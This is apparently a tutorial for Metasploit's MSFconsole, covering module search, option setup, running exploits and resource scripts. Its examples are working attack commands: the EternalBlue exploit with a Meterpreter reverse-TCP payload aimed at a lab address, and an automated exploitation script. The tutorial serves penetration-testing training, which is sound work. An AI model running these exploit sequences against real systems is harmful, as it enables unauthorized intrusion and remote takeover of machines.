💻 Introduction to MSFconsole¶
MSFconsole is the primary and most powerful interface for interacting with the Metasploit Framework. It provides a unified command-line environment for searching modules, configuring exploits, managing sessions, and interacting with the database.
1️⃣ Starting MSFconsole¶
# Start MSFconsole
msfconsole
# Start quietly (suppress the banner)
msfconsole -q
# Start and execute a command immediately
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.10.5; run"
Tip
The -x flag is extremely useful for scripting. You can chain multiple commands with semicolons to automate entire exploitation workflows.
2️⃣ Essential Commands¶
Navigation & Help¶
| Command | Description |
|---|---|
help or ? |
Display all available commands. |
help <command> |
Get detailed help for a specific command. |
version |
Show the current Metasploit version. |
banner |
Display a random Metasploit banner. |
exit / quit |
Exit MSFconsole. |
history |
Show command history. |
Searching for Modules¶
# Search by keyword
search eternalblue
# Search by CVE
search cve:2017-0144
# Search by module type
search type:exploit platform:windows smb
# Search by author
search author:hdm
# Search by module path
search path:windows/smb
# Combine filters
search type:exploit platform:linux name:apache rank:excellent
Concept
The search command supports multiple filters that can be combined. The most useful filters are type:, platform:, name:, cve:, rank:, and path:. Results are displayed with a Rank column — always prefer modules ranked excellent or great as they are more reliable.
Module Ranks¶
| Rank | Description |
|---|---|
ExcellentRanking |
The exploit will never crash the service. |
GreatRanking |
Automatically selects the correct target and is version-aware. |
GoodRanking |
Reliable but may require manual target selection. |
NormalRanking |
Default — the exploit is average reliability. |
AverageRanking |
Can be unreliable but may succeed. |
LowRanking |
Difficult to exploit successfully. |
ManualRanking |
Unstable or requires significant manual effort. |
3️⃣ Selecting and Configuring Modules¶
Using a Module¶
# Select a module
use exploit/windows/smb/ms17_010_eternalblue
# View module information (description, references, targets, options)
info
# Show required and optional settings
show options
# Show available targets (OS versions, architectures)
show targets
# Show compatible payloads
show payloads
Setting Options¶
# Set a required option
set RHOSTS 10.10.10.5
# Set multiple targets
set RHOSTS 10.10.10.0/24
# Set the payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Set the listener (your machine)
set LHOST 10.10.14.2
set LPORT 4444
# View current settings
show options
Global Options (setg)¶
# Set a value globally (persists across module changes)
setg RHOSTS 10.10.10.5
setg LHOST 10.10.14.2
# Unset a global option
unsetg RHOSTS
Tip
Use setg LHOST <your_ip> at the start of every session. This saves you from repeatedly setting your listener IP when switching between modules.
4️⃣ Running Modules¶
# Execute the module
run
# Or use the alias
exploit
# Run in the background (returns to the MSFconsole prompt immediately)
run -j
# Run against multiple hosts with threads
set THREADS 10
run
Checking Before Running¶
Note
Not all modules support the check command. When available, it performs a non-destructive vulnerability check — always use it before running potentially dangerous exploits.
5️⃣ Navigating Between Modules¶
# Go back to the main prompt (deselect current module)
back
# Switch directly to another module (no need to `back` first)
use auxiliary/scanner/smb/smb_version
# View recently used modules
previous
6️⃣ Resource Scripts¶
Resource scripts (.rc files) allow you to automate MSFconsole workflows by listing commands in a text file.
Creating a Resource Script¶
# Create a file called auto_exploit.rc
cat > auto_exploit.rc << 'EOF'
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.5
set LHOST 10.10.14.2
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit -j
EOF
Running a Resource Script¶
# From the command line
msfconsole -r auto_exploit.rc
# From inside MSFconsole
resource auto_exploit.rc
Auto-Run Script on Startup¶
Place .rc files in ~/.msf4/ to have them run automatically when MSFconsole starts.
7️⃣ Useful Tips & Gotchas¶
Tip
Tab completion works everywhere in MSFconsole — module paths, option names, option values, and even file paths. Use it liberally.
Tip
Command history is saved across sessions in ~/.msf4/history. You can search it with Ctrl+R (reverse search), just like in bash.
Note
If you start MSFconsole and see warnings about the database not being connected, run msfdb init first to set up and start the PostgreSQL backend. Without the database, features like hosts, services, creds, and vulns won't work.
Note
Running MSFconsole as root is often necessary for certain exploits (e.g., those requiring raw sockets on ports below 1024). On Kali Linux, the default user is root, so this is typically not an issue.
Warning
MSFconsole is a powerful exploitation tool. Always ensure you have explicit written authorization before targeting any system.